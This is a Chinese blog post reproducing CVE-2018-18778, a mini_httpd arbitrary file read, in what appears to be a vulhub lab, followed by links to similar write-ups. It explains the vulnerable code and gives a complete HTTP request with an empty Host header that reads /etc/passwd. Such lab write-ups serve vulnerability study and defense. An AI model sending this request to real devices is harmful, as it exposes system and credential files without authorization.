不安全的配置----mini_httpd任意文件读取漏洞(CVE-2018-18778)

最新推荐文章于 2024-02-18 10:55:05 发布
最新推荐文章于 2024-02-18 10:55:05 发布
阅读量984 收藏 2
点赞数 9
分类专栏: 漏洞复现 文章标签: 漏洞复现 httpd 不安全的配置 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/105883541
版权

mini_httpd任意文件读取漏洞(CVE-2018-18778)

Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。

在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。

虚拟主机模式并不是默认开启,需要在命令行利用-v参数开启(mini_httpd -v -C mini_httpd.conf)

当虚拟主机模式开启后,网络请求文件的绝对路径为:Host头+url。因此攻击者只要在web端口访问服务器时,设置Host头为空,等同于通知服务器需要某绝对物理路径文件。

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

见上述代码,分析如下:

  • 当HOST=example.com、FILE=index.html的时候,上述语句结果为example.com/index.html,文件正常读取。
  • 当HOST为空、FILE=etc/passwd的时候,上述语句结果为/etc/passwd

后者被作为绝对路径,于是读取到了/etc/passwd,造成任意文件读取漏洞。

漏洞复现

环境启动后,访问http://your-ip:8080即可看到Web页面。

发送请求是将Host置空,PATH的值是文件绝对路径:

GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

成功读取文件:

在这里插入图片描述

humble嘻
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
mini_httpd任意文件读取漏洞CVE-2018-18778
锋刃科技的博客
06-19 2959
前言 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本 ACME mini_httpd before 1.30 漏洞分析 在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE.
CVE-2018-18778 mini_httpd任意文件读取
weixin_51387754的博客
12-03 3241
漏洞简介 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。 (void) snprintf( vfile, sizeof(vfile),
漏洞复现----16、mini_httpd任意文件读取漏洞CVE-2018-18778
七天
11-01 1527
文章目录一、mini_httpd简介二、漏洞简介三、漏洞复现 一、mini_httpd简介 mini_httpd是一台小型 HTTP 服务器。其性能不是很好,但对于低或中等流量的网站,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 它实现了 HTTP 服务器的所有基本功能,包括: GET、HEAD和POST方法;
mini_httpd任意文件读取漏洞 CVE-2018-18778 漏洞复现
ADummy的博客
03-10 459
mini_httpd任意文件读取漏洞CVE-2018-18778) by ADummy 0x00利用路线 ​ Burpsuite修改HOST头—>文件读取 0x01漏洞介绍 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 在mini_httpd开启虚拟主
vulhub mini_httpd漏洞复现 | CVE-2018-18778任意文件读取漏洞
最新发布
鱼溯的博客
02-18 652
vulhub mini_httpd漏洞复现 | CVE-2018-18778任意文件读取漏洞
CVE-2018-18778任意文件读取漏洞复现
m0_48736242的博客
10-10 1706
CVE-2018-18778任意文件读取漏洞复现
Mini_httpd任意文件读取漏洞复现CVE-2018-18778
Atkx's Blog
02-09 765
漏洞简介 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件漏洞分析 (void) snprintf( vfile, sizeof(vf
CVE-2018-18778任意文件读取漏洞
qq_61702710的博客
07-16 761
Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。当mini_httpd开启虚拟主机时,此时对文件请求就变成去访问host+请求的文件路径的内容 当我们把host为空时,就变成直接去访问请求的文件路径的内容了 当我们把请求的文件路径写为etc/passwd,也就变成了去访问服务器本地的psswd文件中的内容了。1.从vulhub中开启此环境。
利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞CVE-2018-18778
JiangBuLiu的博客
07-12 1947
mini_httpd任意文件读取漏洞CVE-2018-18778)Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/ 漏洞原理 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下...
CVE-2018-18778.docx
07-23
**CVE-2018-18778mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
mini_httpd-1.19.tar.7z
11-20
解压后,你可以看到"mini_httpd-1.19.tar"这个文件,它是用tar格式打包的源代码,通常用于在Unix或类Unix系统中分发软件。你可以通过执行`tar -xvf mini_httpd-1.19.tar`命令来解压源代码。 接下来,我们探讨mini_...
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。...
WebF020.rar_c8051 web_mini_httpd-1.19.tar_web 上位机_嵌入式web
07-14
基于单片机C8051F020与以太网进行通信程序,实现了一个简单的嵌入式Web服务器。本示例程序将C8051F020内的温度传感器采集的温度、电位器的输入电压值传给上位机,上位机可发送命令控制指示灯的亮和灭。
mini_httpd.rar_Linux cgi_httpd cgi_linux 服务器_mini httpd_mini_h
07-14
值得注意的是,由于mini_httpd设计简洁,其配置文件一般较为直观,用户可以根据需求轻松定制。在优化方面,可以通过调整监听端口、最大连接数、超时时间等参数来提高服务器的响应速度和并发能力。 五、安全与维护 ...
apache经典换行解析漏洞CVE-2017-15715)
qq_43571759的博客
04-19 1531
文章目录Apache HTTPD 换行解析漏洞CVE-2017-15715)漏洞分析漏洞复现 Apache HTTPD 换行解析漏洞CVE-2017-15715) 漏洞分析 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安...
weblogic----CVE-2017-10271漏洞复现
qq_43571759的博客
04-07 1237
CVE-2017-10271漏洞复现 漏洞描述: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 序列化: 明明序列化那么多漏洞为什么还要序列化?因为便于传输,第一次接触到序列化是PHP的序列化,当时个人理解就是把一个对象转换成字符串进行传输,需要使用的时...
安全配置导致apache未知后缀名解析漏洞分析
qq_43571759的博客
04-26 1067
Apache HTTPD不安全配置导致未知后缀解析漏洞 该环境版本: PHP 7.x 最新版 Apache HTTPD 2.4.10 稳定版(来自debian源) 由此可知,该漏洞与Apache、php版本无关,属于用户配置不当造成的解析漏洞漏洞分析 图中的配置文件中高亮部分也是此漏洞的关键所在 <FilesMatch ".+\.ph(p[345]?|t|tml)$"> S...
S2-001 远程代码执行漏洞复现
qq_43571759的博客
03-26 973
S2-001 远程代码执行漏洞漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 搭建靶机环境: 1.进入v...
httpd-2.4.6-88.el7.centos.x86_64.rpm
01-09
httpd-2.4.6-88.el7.centos.x86_64.rpm是一个用于CentOS系统的httpd软件包。它是一个用于创建和管理Web服务器的软件,常用于搭建网站和提供网络服务。 该软件包的版本号为2.4.6,表示它是httpd的第二个大版本、第四...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值